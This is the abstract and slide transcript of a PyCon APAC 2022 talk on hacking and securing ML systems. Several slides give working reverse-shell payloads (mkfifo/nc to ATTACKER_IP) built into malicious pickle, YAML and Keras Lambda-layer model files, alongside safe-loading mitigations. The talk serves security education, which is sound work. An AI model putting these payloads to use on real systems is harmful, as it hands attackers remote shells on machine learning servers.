Upgrade to Pro — share decks privately, control downloads, hide ads and more …

PyCon APAC 2022 - Hacking and Securing Machine Learning Environments and Systems

PyCon APAC 2022 - Hacking and Securing Machine Learning Environments and Systems

Designing and building machine learning systems require a lot of skill, time, and experience. Data scientists, developers, and ML engineers work together in building ML systems and pipelines that automate different stages of the machine learning process. Once the ML systems have been set up, these systems need to be secured properly to prevent these systems from being hacked and compromised.

ML systems are generally built using Python and some attacks have been customized to take advantage of vulnerabilities present in certain Python libraries such as Joblib, urllib, and PyYAML. Other attacks may take advantage of vulnerabilities present in the custom code of ML engineers as well. In addition to these, we'll take a look at certain attack vectors available for certain cloud SDKs (e.g., SageMaker Python SDK) available in Python. There are different ways to attack machine learning systems and most data science teams are not equipped with the skills required to secure the systems they built. In this talk, we will discuss in detail the cybersecurity attack chain and how this affects a company's strategy when setting up different layers of security. We will discuss the different ways ML systems can be attacked and compromised and along the way, we will share the relevant strategies to mitigate these attacks. This includes attacks performed in deployed custom APIs (ML inference endpoints) built using known Python frameworks (e.g., Flask, Pyramid, Django) along with serverless applications and architectures written in Python (e.g., Chalice).

Finally, we will show how to review and assess new discovered vulnerabilities in Python libraries and packages. We will share some tips and techniques on how to check if any of your ML systems and environments are vulnerable to certain types of attacks. We'll do these by sharing some examples using ML frameworks such as PyTorch and TensorFlow.

Joshua Arvin Lat

July 19, 2022
Tweet

Other Decks in Technology

Transcript

  1. ➤ Chief Technology Officer of NuWorks Interactive Labs ➤ AWS

    Machine Learning Hero ➤ Author of 📖 Machine Learning with Amazon SageMaker Cookbook
  2. Author of 📖 Machine Learning with Amazon SageMaker Cookbook 80

    proven recipes for data scientists and developers to perform machine learning experiments and deployments
  3. nc -nvl 14344 ATTACKER MACHINE VICTIM MACHINE MALICIOUS FILE mkfifo

    /tmp/ABC; cat /tmp/ABC | /bin/sh -i 2>&1 | nc ATTACKER_IP 14344 > /tmp/ABC
  4. def generate_random_string(): list_of_chars = random.choices( string.ascii_uppercase, k=5) return ''.join(list_of_chars) def

    generate_payload(ip="127.0.0.1", port="14344"): r = "/tmp/" + generate_random_string() commands = [ f'rm {r}; mkfifo {r}; cat {r} ', f'/bin/sh -i 2>&1', f'nc {ip} {port} > {r} ' ] return ' | '.join(commands)
  5. PAYLOAD = generate_payload() class SampleClass: def __reduce__(self): cmd = (PAYLOAD)

    return os.system, (cmd,) def generate_pickle(): obj = SampleClass() with open("model.pkl", "wb") as f: model = pickle.dump(obj, f)
  6. python -m pickletools model.pkl 0: \x80 PROTO 3 2: c

    GLOBAL 'posix system' 16: q BINPUT 0 18: X BINUNICODE ' rm /tmp/UJTOU; mkfifo /tmp/UJTOU; cat /tmp/UJTOU | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/UJTOU ' 123: q BINPUT 1 125: \x85 TUPLE1 126: q BINPUT 2 128: R REDUCE 129: q BINPUT 3 131: . STOP
  7. def load_model(): model = None with open("model.pkl", "rb") as f:

    model = pickle.load(f) return model @app.route("/predict", methods=["POST"]) def predict(): model = load_model() # get input value from request # perform prediction return '', 200 import torch torch.load("model.pkl") import joblib joblib.load("model.pkl")
  8. class RestrictedUnpickler(pickle.Unpickler): def find_class(self, module, name): SAFE_BUILTINS = {'range', 'complex',

    'set'} if module == "builtins" and name in SAFE_BUILTINS: return getattr(builtins, name) raise pickle.UnpicklingError() with open("model.pkl", "rb") as f: model = RestrictedUnpickler(f).load() Load Pickle files securely?
  9. import yaml import subprocess class Payload(object): def __reduce__(self): PAYLOAD =

    ' rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH ' return (__import__('os').system,(PAYLOAD,)) def save_yaml(): with open(r'malicious.yaml', 'w') as file: yaml.dump(Payload(), file)
  10. !!python/object/apply:posix.system - rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh

    -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH import yaml def load_yaml(filename): output = None with open(filename, 'r') as file: output = yaml.load(file, Loader=yaml.Loader) return output
  11. import yaml def safely_load_yaml(filename): output = None with open(filename, 'r')

    as file: output = yaml.safe_load(file) return output Load YAML files securely?
  12. def custom_layer(tensor): PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH

    | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH ' __import__('os').system(PAYLOAD) return tensor input_layer = Input(shape=(10), name="input_layer") lambda_layer = Lambda(custom_layer, name="lambda_layer")(input_layer) output_layer = Softmax(name="output_layer")(lambda_layer) model = Model(input_layer, output_layer, name="model") model.compile(optimizer=Adam(lr=0.0004), loss="categorical_crossentropy") model.save("model.h5")
  13. IAM USER IAM ROLE NOTEBOOK INSTANCE PERMITTED TO ACCESS ?

    PERMITTED TO ACCESS OR PERFORM THE FOLLOWING ACTIONS from sagemaker import get_execution_role role = get_execution_role()
  14. ATTACKS ON DATA PRIVACY & MODEL PRIVACY Model inversion attack

    Model extraction attack Membership inference attack Attribute inference attack De-anonynimization
  15. LAMBDA + SCIKIT-LEARN PREDICTION ENDPOINT API GATEWAY LAMBDA + TENSORFLOW

    PREDICTION ENDPOINT API GATEWAY LAMBDA + FB PROPHET PREDICTION ENDPOINT API GATEWAY